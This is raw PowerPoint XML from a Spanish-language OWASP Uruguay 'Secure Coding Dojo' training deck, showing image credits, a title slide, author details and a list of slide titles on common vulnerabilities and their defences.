            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Stux - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId9">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://pixabay.com/photos/black-board-chalk-traces-school-1072366/</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>StruffelProductions - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId10">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://pixabay.com/photos/code-programming-love-computer-3078609/</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>TeroVasalainen - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId11">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://pixabay.com/photos/question-mark-hand-drawn-solution-2123969/</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2200" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>StartupStockPhotos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>https://pixabay.com/photos/children-win-success-video-game-593313/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ataque-Gramas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>creados</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>por</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Paul Ionescu y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>distribuidos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>el</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Secure Coding Dojo project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="359856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43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="127222" y="240620"/>
            <a:ext cx="17295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¡Gracias!</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="CuadroTexto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8433ED5-8AC6-16B5-2BAC-028CB7895ADC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4533706" y="5098366"/>
            <a:ext cx="4003190" cy="601960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="841248">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="1656" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Gerardo Canedo</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-UY" sz="1656" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="es-UY" sz="1656" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>https://www.linkedin.com/in/gcanedo/</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Ad Image 203,395,254">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D340779-6C0D-D590-F9AB-382525452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809" y="5162534"/>
            <a:ext cx="501037" cy="5010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3DA668-FD2F-EE94-9945-53AB80B77840}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5481677" y="2083914"/>
            <a:ext cx="5043415" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92EE274B-1E2A-70EA-1588-66EEC9E75AF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="screen">
            <a:duotone>
              <a:schemeClr val="accent6">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
            <a:alphaModFix/>
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId5">
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="5107"/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:saturation sat="79000"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8215406" y="2083918"/>
            <a:ext cx="628778" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1C67C01-D1E2-63A7-BB0F-E5F709FD5FDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7036472" y="2999115"/>
            <a:ext cx="5043415" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dojo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6535713A-8D48-7E2F-1512-BECF41CBD117}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7627382" y="2083917"/>
            <a:ext cx="1322897" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFD44B8D-2802-2944-774C-9EBECF591C7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8536896" y="2083914"/>
            <a:ext cx="2507674" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Google Shape;19;p46" descr="Logo&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BFF0B40-31C0-8C13-8DB9-DA7F8C54D7F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1355343" y="1692003"/>
            <a:ext cx="1611332" cy="1611332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Google Shape;21;p46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF230D82-FEFE-28BC-AB16-BC6253ABBA68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1013146" y="3347171"/>
            <a:ext cx="229572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0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>OWASP UY</a:t>
            </a:r>
            <a:endParaRPr sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="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5088</TotalTime>
  <Words>2972</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>600</Paragraphs>
  <Slides>95</Slides>
  <Notes>69</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95</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="105" baseType="lpstr">
      <vt:lpstr>Cambria Math</vt:lpstr>
      <vt:lpstr>Radley</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Cascadia Code</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Ataque-Gramas</vt:lpstr>
      <vt:lpstr>Evasión de Autenticación</vt:lpstr>
      <vt:lpstr>Confianza en entradas de datos no fiables</vt:lpstr>
      <vt:lpstr>Autorización  ausente o incorrecta</vt:lpstr>
      <vt:lpstr>Falta de cifrado de datos sensibles</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Hashes sin sal</vt:lpstr>
      <vt:lpstr>Adivinar contraseñas</vt:lpstr>
      <vt:lpstr>Desbordamiento de enteros</vt:lpstr>
      <vt:lpstr>Descarga de código sin verificaciones de integridad</vt:lpstr>
      <vt:lpstr>Redirección no validada</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Carga de archivo peligroso</vt:lpstr>
      <vt:lpstr>Entidades Externas XML</vt:lpstr>
      <vt:lpstr>Path Traversal</vt:lpstr>
      <vt:lpstr>Inyección de comandos OS</vt:lpstr>
      <vt:lpstr>Inyección SQL</vt:lpstr>
      <vt:lpstr>Deserialización Insegura</vt:lpstr>
      <vt:lpstr>Buffer Overflow</vt:lpstr>
      <vt:lpstr>Inyección de formato de string</vt:lpstr>
      <vt:lpstr>Previniendo ataques de Software</vt:lpstr>
      <vt:lpstr>La punta del Iceberg</vt:lpstr>
      <vt:lpstr>Validación de Entradas</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Respuesta:  Ambos</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Respuesta:  Top.java</vt:lpstr>
      <vt:lpstr>Caracteres especiales innecesarios</vt:lpstr>
      <vt:lpstr>Ejemplo de función de validación de entradas</vt:lpstr>
      <vt:lpstr>Algunos ejemplos</vt:lpstr>
      <vt:lpstr>Vulnerabilidades =    F(Entradas / (1 + Validaciones))</vt:lpstr>
      <vt:lpstr>Ataques prevenidos con la validación de entradas</vt:lpstr>
      <vt:lpstr>¿Qué hacemos con los irlandeses?</vt:lpstr>
      <vt:lpstr>En resumen…</vt:lpstr>
      <vt:lpstr>Las concatenaciones</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Respuesta:  top.java</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Respuesta:  top.java</vt:lpstr>
      <vt:lpstr>Frameworks ORM</vt:lpstr>
      <vt:lpstr>En resumen…</vt:lpstr>
      <vt:lpstr>Problemas con la Memoria</vt:lpstr>
      <vt:lpstr>Funciones más seguras de memoria</vt:lpstr>
      <vt:lpstr>Verificar los límites</vt:lpstr>
      <vt:lpstr>¿Inyecciones de memoria?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Respuesta:  bottom.cpp (uso de funciones peligrosas)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Respuesta:  bottom.cpp (cálculo incorrecto del tamaño del buffer)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Respuesta: Top (Inyección de formato de String)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Respuesta: Top (Off by one)</vt:lpstr>
      <vt:lpstr>En resumen…</vt:lpstr>
      <vt:lpstr>Asegurando los datos</vt:lpstr>
      <vt:lpstr>Asegurando los datos</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Respuesta:  hashing_top.java (password almacenado con un hash sin saltear)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Respuesta:  boton.java (Usuario y password transmitidos en claro a través de parámetros del query)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Respuesta:  top.java (Detalles personales y tarjetas de crédito almacenada en claro en un bucket S3)</vt:lpstr>
      <vt:lpstr>En resumen…</vt:lpstr>
      <vt:lpstr>Proteger las Interfaces de Usuario web (UI)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Defendiéndose de XSS</vt:lpstr>
      <vt:lpstr>Codificación de HTML neutraliza XSS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Respuesta:  bottom.jsp (La entrada de datos es escrita en la página como es ingresado)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Respuesta:  bottom.html (Los datos son incluidos en un atributo HTML peligroso)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Respuesta:  top.html (Código es ejecutado dentro de una función peligrosa, siendo de hecho un ejemplo de una inyección de código)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Respuesta:  bottom.jsp (La entrada está siendo reflejada dentro de los tags &lt;script&gt;)</vt:lpstr>
      <vt:lpstr>En resumen…</vt:lpstr>
      <vt:lpstr>Referencia indirecta a objetos</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Respuesta:  top.jsp (La entrada es concatenada a un path del sistema permitiendo su manipulación)</vt:lpstr>
      <vt:lpstr>En resumen…</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Desafíos para hoy</vt:lpstr>
      <vt:lpstr>Créditos de las imágenes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GERARDO CANEDO</cp:lastModifiedBy>
  <cp:revision>142</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-29T16:42:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-30T12:50:17Z</dcterms:modified>
</cp:coreProperties>
</file>